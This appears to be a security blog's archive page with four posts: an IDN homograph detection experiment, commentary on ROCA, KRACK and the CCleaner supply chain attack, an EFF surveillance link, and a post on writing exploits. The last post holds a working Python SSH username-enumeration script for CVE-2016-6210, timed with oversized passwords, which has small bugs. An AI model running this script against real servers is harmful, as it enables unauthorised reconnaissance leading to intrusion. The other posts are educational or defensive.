Programming, Security, Privacy, Technical

A Study in IDN Homograph Attack Detection

A Brief Introduction…

How well do you scrutinize the URLs that you click in a browser? Are you the wild type who click links before you read them? Or perhaps you are the cautious type — One of the careful number who hover over the link (without clicking), check the address that appears in the browser bar, and that it has a valid certificate (which might not mean so much as people think).

Let’s say that you are trying to get to ‘facebook.com’. You see a link and hover over it. The URL that appears in the browser bar says ‘facebook.com’. You click the link, but it takes you to a phishing site.

What happened? You checked the link. It said it was ‘facebook.com’!

You may have fallen victim to an IDN homograph attack. A homograph is a word that looks the same but has two meanings. In the example above, the user clicked a link that looked like ‘facebook.com’ but had a different meaning. How can that happen? The ‘how’ comes from the ‘IDN’ portion of the name: ‘internationalized domain name’. The URL in the address bar is actually pointing to a domain name. A domain name is the human-readable name of a website. The real address of a website (server) is an IP address, but people aren’t that great at remembering those so domain names make them memorable. For example, you can remember ‘facebook.com’ (the domain name) or you can remember ‘31.13.76.68’ (the ip address). The problem with domain names is that there are many languages. How do you support Mandarin characters in a domain name? Or Russian? You have to internationalize your ‘charset’ (The allowed characters, or individual letters). By internationalizing your charset, you now accept a far greater amount of characters than just simple English (latin-based) characters. This now lets people have domain names in their own language. But there is a down-side. In the charset, the same character may appear multiple times under different languages. For example, Cyrillic and Greek charsets (or alphabets) share similar characters (letters) to Latin. These characters will have separate identifiers, but will look very close, if not identical, to each other.

In the facebook example, the lower-case letter ‘o’ is identified by a character code ‘006F’ for the Latin alphabet (“Small letter o”), but could also be ’03BF’ in the Greek alphabet (small letter Omicron). If I were to register a domain name of facebook.com but with the Greek version of those letters, it may pass an internationalized domain name registration. I could then use this URL to trick people into clicking the link because it will visually look like the real thing. An even simpler example is the substitution of a capital ‘O’ with the number zero (0) in the domain name.

I wanted to see if I could detect these types of attacks and flag them using basic statistics.

The Idea…

My idea was quite simple. Each character in a charset can be broken down into their unique identifier (number) and alphabets (or charsets) are grouped together and thus their identifiers will be close together. The plan was to run basic statistical analysis (mean, median, max, min, and standard deviation) on the individual characters of a URL (or domain name). If there are characters that are outside the usual range, then throw a ‘red flag’. I also had to account for the fact that punctuation may throw off any analysis so there will have to be at least a few methods to identify anomalies — hence the calculation of mean, median, max, min, and standard deviations. I also avoided using neural networks for this particular problem although, as you will see in my summary/future works section, I can see merit in taking it that way.

I wanted a basic proof-of-concept system that would take a corpus of known valid URLs and derive a statistical model from them. Then I would use this model to compare new URLs and determine if they are within the same alphabet or if there was a possibility that they were homograph attacks.

The Project…

You can see/fork/download the project code here: https://github.com/calebshortt/homograph_detector

The project is quite simple and has two files in the main ‘base’ package. The ‘meat’ of the system is in the analysis.py file. The ‘results.py’ file was used to manage and compare results.

The flow is as such:

  1. Train the system using either a given string or a file with many strings
  2. Pass the system either a given string of a file with many strings to test
  3. Generate results and output them

The comparison function simply takes the statistics for the given test string and compares it (based on a defined number of standard deviations — default 2) to the model statistics — these are based on mean, median, and the standard deviations themselves (I actually created a metric that is the standard deviation of standard deviations). It also compares the max and min ranges of the character identifiers — this is a crude way to check the number ranges.

Here is the comparison function code:

def compare(self, str_stats, stdev_threshold=2):
        """
        :param str_stats: ResultSet object
        :param stdev_threshold: (int) number of standard deviations allowed
        :return:
        """

        print('Analysing: Threshold: 2 standard deviations...')

        str_max = str_stats.result_max
        str_min = str_stats.result_min
        str_mean = str_stats.mean_means
        str_median = str_stats.mean_medians
        str_stdev = str_stats.mean_stdevs

        if not (self.result_min <= str_min <= str_max <= self.result_max):
            return False, str_stats.all_stats, 'max/min range'

        r_mean_low = self.mean_means - stdev_threshold*self.stdev_means
        r_mean_high = self.mean_means + stdev_threshold*self.stdev_means
        if not (r_mean_low <= str_mean <= r_mean_high):
            return False, str_stats.all_stats, 'mean'

        r_median_low = self.mean_medians - stdev_threshold*self.stdev_medians
        r_median_high = self.mean_medians + stdev_threshold*self.stdev_medians
        if not (r_median_low <= str_median <= r_median_high):
            return False, str_stats.all_stats, 'median'

        r_std_low = self.mean_stdevs - stdev_threshold*self.stdev_stdevs
        r_std_high = self.mean_stdevs + stdev_threshold*self.stdev_stdevs
        if not (r_std_low <= str_stdev <= r_std_high):
            return False, str_stats.all_stats, 'stdev'

return True, str_stats.all_stats, None

NOTE: The above code compares the given string to the model ResultSet data in ‘self’.

Preliminary Results, Conclusion, and Future Work

The system was able to digest a Latin alphabet-based corpus (included in the source) and correctly identify URLs that had characters from other alphabets in them. The interesting thing about this method is that once the model is generated based on the corpus, it can be recorded and reused — no need to regenerate the model (which took the most time). The system was fast and quite accurate at first glance, although more analysis would be needed to make any real claims on its accuracy.

My file load function breaks on some charsets as they are not included in the default encoding for the python file-loading function (that or I missed something). I am working to fix this without clobbering the original encoding of the URL (which would defeat the purpose of this experiment).

This is already starting to look like a neural network would work nicely for this particular problem. I would like to feed the model stats into an ANN with perhaps some other inputs and see how it does. The basic stats I used were able to get decent results, but there are obvious edge cases that standard statistics wouldn’t identify (such as the old ‘substitute the 0 (zero) in for capital O’ trick). A neural network may help catch those.

I would say that it is quite possible to identify IDN homograph attacks using basic statistics and there are a few paths forward to improve accuracy with the results already demonstrated. With that said, nothing will compare to the standard ‘look before you click’ mentality. Users who identify the ‘0 instead of O’ substitution will not leave as much to chance. Systems like these aren’t catch-alls.

Standard
Programming, Security, Privacy, Technical

Growing Threats, Growing Attack Surface

It has been an interesting year of breaches, vulnerabilities, and scares. With the more recent ROCA vulnerability in Infineon’s TPM, a widely used module in the Smart Card industry, to the less-exploitable-but-still-serious KRACK vulnerability that makes hacking the WPA2 Wi-Fi security protocol possible, to the supply chain attack of CCleaner, a popular utility program for cleaning up a user’s computer.

What is clearly emerging from such events is that there is still much work to be done in the security space. The Ixia Security Report for 2017 describes an increase in the amount of malware and an increase in the size of company’s attack surface. Attack surface is the exposed, or public-facing, “surface area” of a company. Some have attributed the increase of attack surface to an increased usage and misconfiguration of cloud infrastructure. They argue that misconfiguration of servers looks to be replacing some of the more traditional OWASP top 10 vulnerabilities — such as SQL injection.

 

But the vulnerabilities listed above (ROCA, KRACK, and the CCleaner supply chain attack) aren’t necessarily cloud-related.

ROCA relates to an incorrectly-implemented software library — specifically the key pair generation. It allows an attacker to factor the private (secret) key just from using the public key. Modern encryption relies on a public key (that is sent to whoever wants it) and a secret (private) key that only the owner has and is used to decrypt messages. Only the private key can decrypt messages to the owner. This vulnerability allows anyone with the public key and some decent computational power (say an AWS cluster used to number-crunch) to get the original private key and decrypt the messages sent to the original owner. The computational power required is in the realm of “expensive but possible”. A targeted attack is a very real possibility, but widespread breaching would be infeasible.

KRACK involves a replay attack. “By repeatedly resetting the nonce transmitted in the third step of the WPA2 handshake, an attacker can gradually match encrypted packets seen before and learn the full keychain used to encrypt the traffic”. This vulnerability requires a physical component as the attacker will have to be on the Wi-Fi network. The cause is inherent to the standard — which means all correctly-implemented versions of the standard are vulnerable (i.e. Libraries that implemented it to spec). Many security practitioners have taken this particular moment in time to explain that the usage of a Virtual Private Network (VPN) would mitigate such attacks, and that Wi-Fi should be an un-trusted source to begin with.

The CCleaner supply chain attack included an injection of malware in a library that is used in the implementation of CCleaner. When the CCleaner program is packaged and deployed it will include this third-party library in its package. This type of attack takes advantage of consumer’s trust in CCleaner, and it is becoming a more popular attack for hackers. For the record, CCleaner has been sanitized and is no longer a threat from this malware. I imagine Avast, the company that offers CCleaner, also took a look at their supply chain trust and revamped some policies around it.

 

Each of these attacks are in addition to the general increase of attack surface and the misconfiguration of servers (that are becoming more common). There is an increase of supply chain attacks because they clearly work. There are plenty of incorrect implementations of standards or protocols that hackers can take advantage of. There are, far less often, errors in the actual standard or protocol themselves.

It may seem like the odds are piled against an organization’s security team. They are. That is why security is not only the responsibility of the security team, but the entire organization from the executive branch to the developers (who choose to implement specific libraries in their software) to the tech support teams that are often on the “front-line” with customers.

Education is always a good first step.

Standard
General, Security, Privacy

History and its Uncanny Ability to Repeat Itself

The EFF has published a well-cited and informed article on why they view the current trend of dragnet surveillance to be thoroughly against the constitution of the U.S.

Even if you are not an American, this article touches on the ideals of many. It describes the context around why the Fourth Amendment was included and goes into specific detail as to who and why they thought it so important:

“Using ‘writs of assistance,’ the King authorized his agents to carry out wide ranging searches to anyone, anywhere, and anytime regardless of whether they were suspected of a crime. These ‘hated writs’ spurred colonists toward revolution and directly motivated James Madison’s crafting of the Fourth Amendment.”

I highly recommend reading the entire article: The NSA’s “General Warrants”: How the Founding Fathers Fought an 18th Century Version of the President’s Illegal Domestic Spying

 

Standard
Programming, Security, Privacy, Technical

A Look At Using Discovered Exploits

There are usually two general steps for a software exploit to be created.

The first step is the vulnerability discovery. This is the hardest of the two steps. It requires in-depth knowledge about the target software, device, or protocol and a creative mind that is tuned to edge cases and exceptions.

The second step is the exploitation of the discovered vulnerability. This requires the developer to take the vulnerability description and write a module or script that takes advantage of it.

This article will address the second step: Exploit creation.

First, where do we find vulnerabilities for software if we do not discover them ourselves? There are online databases that store published vulnerabilities (and may include example code) in a searchable format. A few are CVE, exploit-db, or the NVD.

Looking through these databases we will see that all published vulnerabilities have a unique CVE identifier. They uniquely identify each vulnerability that has been discovered and confirmed. Using the databases we can search for potential vulnerabilities of a particular target (Note: This is similar to what a bot might try, after it has scanned a new target server, to find any published vulnerabilities).

Some vulnerability descriptions may even sample code — such as CVE-2016-6210. This makes it trivial to write a script that may utilize this vulnerability. For example, we could use the code given to us in CVE-2016-6210 and expand it to make a command-line script that takes a list of known usernames and tries each one… Which is the vulnerability the CVE describes: “SSH Username Enumeration Vulnerability”.

This script will not breach the system, but what it will do is try to find valid usernames via SSH. This vulnerability may lead to, or become part of, a larger attack. It is important to patch all discovered vulnerabilities as you don’t know how an adversary will try to attack your system.

Given the sample code, here is our improved version:


import paramiko
import time
import argparse
import logging

logging.basicConfig()

class Engine(object):
    file_path = None
    target = ''
    userlist = ['root']
    calc_times = []

    req_time = 0.0
    num_pools = 10

    def __init__(self, target, filepath=None, req_time=0.0):
        self.req_time = req_time
        self.target = target
        self.file_path = filepath
        if self.file_path:
            self.load_users(filepath)

    def load_users(self, filepath):
        data = []
        with open(filepath, 'r') as f:
        data = f.read().splitlines()
        self.userlist = data

    def partition_list(self, p_list):
        p_size = len(p_list) / self.num_pools
        for i in xrange(0, len(p_list), p_size):
            yield p_list[i:i+p_size]

    def execute(self):
        for user in self.userlist:
            self.test_with_user(user)

    def test_with_user(self, user):
        p = 'A' * 25000
        ssh = paramiko.SSHClient()
        start_time = time.clock()
        ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
        end_time = time.clock()
        try:
            ssh.connect(self.target, username=user, password=p)
        except:
            end_time = time.clock()
        total = end_time - start_time
        self.calc_times.append(total)
        avg = reduce(lambda x, y: x + y, self.calc_times) / len(self.calc_times)
        flag = '*' if total &amp;amp;gt; avg else ''
        print('%s:\t\t%s\t%s' % (user, total, flag))
        time.sleep(self.req_time)
        ssh.close()

def main(ip_addr, filename=None, req_time=0.0):
    if ip_addr == '' or not ip_addr:
        print('No target IP specified')
        return
    if filename == '':
        filepname = None
    engine = Engine(target=ip_addr, filepath=filename, req_time=req_time)
    engine.execute()

if __name__ == "__main__":
    parser = argparse.ArgumentParser(description='Simple automated script for CVE 2016-6210 -- OpenSSHD 7.2p2 &amp;amp;gt;= version')
    parser.add_argument('ip', help='[Required] The IP of the target server')
    parser.add_argument('-u', '--userlist', help='Specify a filepath with a list of usernames to try -- one username per line')
    parser.add_argument('-t', '--time', help='Set the time between requests (in seconds)')
    ip_addr = None
    filename = None
    req_time = 0.0
    args = parser.parse_args()

    if args.ip:
        ip_addr = args.ip
    if args.userlist:
        filename = args.userlist
    if args.time:
        req_time = float(args.time)
    main(ip_addr, filename, req_time)

 

It is much easier to write exploits for already-discovered vulnerabilities than it is to discover them yourself.

This is why it is vital that system admins keep their servers and software up to date.

 

 

 

Standard